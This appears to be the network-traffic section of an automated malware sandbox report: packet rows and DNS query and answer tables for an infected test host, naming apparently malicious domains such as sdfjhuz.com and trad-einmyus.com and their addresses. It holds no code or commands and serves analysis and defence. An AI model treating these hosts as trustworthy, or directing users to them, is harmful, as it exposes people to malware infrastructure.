                                                                                              May 25, 2024 21:30:23.264918089 CEST49801443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:23.297394991 CEST4434980165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:23.297473907 CEST4434980165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:23.297637939 CEST4434980165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:23.297646999 CEST49801443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:23.297646999 CEST49801443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:23.297830105 CEST49801443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:23.660547018 CEST8049802158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:23.666850090 CEST8049802158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:23.667125940 CEST4980280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:24.144017935 CEST4980280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:24.152137995 CEST8049802158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:24.164622068 CEST49801443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:24.164681911 CEST4434980165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:24.204385996 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.204459906 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.204560995 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.205223083 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.205303907 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.701807022 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:24.701847076 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:24.701931000 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:24.702208996 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:24.702244997 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:24.855284929 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.855489969 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.857026100 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.857055902 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.857551098 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.858246088 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.898525000 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.973859072 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.974081993 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.974246979 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.974824905 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.974864960 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.974937916 CEST49803443192.168.2.4104.196.109.209
                                                                                              May 25, 2024 21:30:24.974952936 CEST44349803104.196.109.209192.168.2.4
                                                                                              May 25, 2024 21:30:24.979255915 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.030901909 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.031076908 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.031122923 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.031122923 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.086083889 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.136501074 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.387742043 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:25.387815952 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:25.388258934 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:25.388281107 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:25.388439894 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:25.388457060 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:25.388525963 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:25.388535023 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:25.770488977 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.771505117 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.775631905 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.775723934 CEST4980580192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:25.777961969 CEST4980680192.168.2.4193.233.132.167
                                                                                              May 25, 2024 21:30:25.782408953 CEST8049805158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:25.792383909 CEST8049806193.233.132.167192.168.2.4
                                                                                              May 25, 2024 21:30:25.792484045 CEST4980680192.168.2.4193.233.132.167
                                                                                              May 25, 2024 21:30:25.792712927 CEST4980680192.168.2.4193.233.132.167
                                                                                              May 25, 2024 21:30:25.846281052 CEST8049806193.233.132.167192.168.2.4
                                                                                              May 25, 2024 21:30:26.299262047 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:26.299365044 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.299431086 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:26.299468994 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:26.299535036 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.301074028 CEST49804443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.301105976 CEST4434980465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:26.307044029 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.307087898 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:26.307403088 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.307723045 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:26.307745934 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.037144899 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.037276030 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.037635088 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.037661076 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.037801981 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.037813902 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.822223902 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.822282076 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.822422981 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.822499990 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.822500944 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.822500944 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.822729111 CEST49807443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.822767019 CEST4434980765.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.829283953 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.829313040 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:27.829389095 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.829693079 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:27.829706907 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:28.632637024 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:28.632772923 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:28.633306980 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:28.633318901 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:28.633487940 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:28.633493900 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:29.428224087 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:29.428392887 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:29.428452015 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.428518057 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.428949118 CEST49808443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.428972006 CEST4434980865.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:29.483241081 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.483266115 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:29.483357906 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.483608961 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:29.483623028 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:30.220388889 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:30.220483065 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:30.223545074 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:30.223552942 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:30.223918915 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:30.223925114 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:30.859816074 CEST4980680192.168.2.4193.233.132.167
                                                                                              May 25, 2024 21:30:30.867741108 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:30.913899899 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:30.914057016 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:30.914263964 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:30.914316893 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:30.977149010 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.023569107 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.024069071 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:31.024240971 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:31.024349928 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.024349928 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.025628090 CEST49809443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.025640011 CEST4434980965.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:31.609360933 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.609392881 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:31.609477043 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.609874964 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:31.609891891 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:31.639491081 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.639945030 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:31.649842978 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.650046110 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:31.655253887 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.655425072 CEST4981080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:30:31.660391092 CEST8049810158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:30:31.661343098 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:31.661387920 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:31.661480904 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:31.661847115 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:31.661865950 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.225346088 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.225431919 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:32.227626085 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:32.227647066 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.228055000 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.229093075 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:32.270586014 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.329755068 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.329957962 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.336513996 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.336523056 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.343943119 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.343947887 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.368645906 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.368666887 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.368727922 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.368733883 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376085997 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376099110 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376152992 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376178026 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376271963 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376307011 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376342058 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376353979 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376441002 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376454115 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.376481056 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:32.376488924 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:32.402286053 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.402472973 CEST44349812162.159.134.233192.168.2.4
                                                                                              May 25, 2024 21:30:32.402555943 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:33.779167891 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:33.779275894 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.779289007 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:33.779342890 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:33.779367924 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.779403925 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.870531082 CEST49811443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.870556116 CEST4434981165.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:33.992095947 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.992124081 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:33.992197990 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.992813110 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:33.992821932 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:34.705179930 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:34.705543995 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:34.705954075 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:34.705961943 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:34.706209898 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:34.706213951 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.454528093 CEST49812443192.168.2.4162.159.134.233
                                                                                              May 25, 2024 21:30:35.500391006 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.500467062 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.500480890 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.500493050 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.500535965 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.500556946 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.511106014 CEST49813443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.511120081 CEST4434981365.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.561739922 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.561764002 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:35.561855078 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.565723896 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:35.565735102 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:36.288960934 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:36.289031982 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:36.295886040 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:36.295892000 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:36.296176910 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:36.296180964 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:37.081563950 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:37.081648111 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:37.081650019 CEST4434981465.109.242.59192.168.2.4
                                                                                              May 25, 2024 21:30:37.081707001 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:37.082110882 CEST49814443192.168.2.465.109.242.59
                                                                                              May 25, 2024 21:30:37.082123995 CEST4434981465.109.242.59192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 25, 2024 21:29:22.875734091 CEST6422653192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:23.035521984 CEST53642261.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:29.669576883 CEST6112853192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:32.215954065 CEST6112853192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:33.203666925 CEST6112853192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:33.333955050 CEST53611281.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:33.341592073 CEST53611281.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:33.341608047 CEST53611281.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:36.966381073 CEST6077053192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:36.978903055 CEST53607701.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:41.202361107 CEST5189553192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:41.990947962 CEST5766853192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:42.187760115 CEST5189553192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:42.415780067 CEST53576681.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:43.203499079 CEST5189553192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:43.437458992 CEST53518951.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:43.444406986 CEST53518951.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:43.444437981 CEST53518951.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:45.130472898 CEST5930053192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:45.203561068 CEST53593001.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:29:52.468744993 CEST6527853192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:29:52.816270113 CEST53652781.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:30:24.181798935 CEST5248553192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:30:24.203641891 CEST53524851.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:30:31.643358946 CEST5200653192.168.2.41.1.1.1
                                                                                              May 25, 2024 21:30:31.660413027 CEST53520061.1.1.1192.168.2.4
                                                                                              May 25, 2024 21:30:43.046724081 CEST6152453192.168.2.41.1.1.1
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              May 25, 2024 21:29:22.875734091 CEST192.168.2.41.1.1.10x53cfStandard query (0)trad-einmyus.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:29.669576883 CEST192.168.2.41.1.1.10xc8d9Standard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:32.215954065 CEST192.168.2.41.1.1.10xc8d9Standard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.203666925 CEST192.168.2.41.1.1.10xc8d9Standard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:36.966381073 CEST192.168.2.41.1.1.10x881Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:41.202361107 CEST192.168.2.41.1.1.10xab9aStandard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:41.990947962 CEST192.168.2.41.1.1.10x210aStandard query (0)www.safeautomationbd.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:42.187760115 CEST192.168.2.41.1.1.10xab9aStandard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:43.203499079 CEST192.168.2.41.1.1.10xab9aStandard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:45.130472898 CEST192.168.2.41.1.1.10xaa3bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:52.468744993 CEST192.168.2.41.1.1.10xf412Standard query (0)nessotechbd.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:24.181798935 CEST192.168.2.41.1.1.10xf696Standard query (0)transfer.adttemp.com.brA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:31.643358946 CEST192.168.2.41.1.1.10x7027Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:30:43.046724081 CEST192.168.2.41.1.1.10xc391Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              May 25, 2024 21:29:23.035521984 CEST1.1.1.1192.168.2.40x53cfNo error (0)trad-einmyus.com158.160.165.129A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.126.89A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com181.204.98.226A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.53.170.126A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com186.4.194.68A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.164.95.127A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com31.192.250.185A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.91.64A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.333955050 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.178.135.84A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.126.89A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com181.204.98.226A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.53.170.126A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com186.4.194.68A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.164.95.127A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com31.192.250.185A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.91.64A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341592073 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.178.135.84A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.126.89A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com181.204.98.226A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.53.170.126A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com186.4.194.68A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.164.95.127A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com148.230.249.9A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com31.192.250.185A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.163.91.64A (IP address)IN (0x0001)false
                                                                                              May 25, 2024 21:29:33.341608047 CEST1.1.1.1192.168.2.40xc8d9No error (0)sdfjhuz.com189.178.135.84A (IP address)IN (0x0001)false
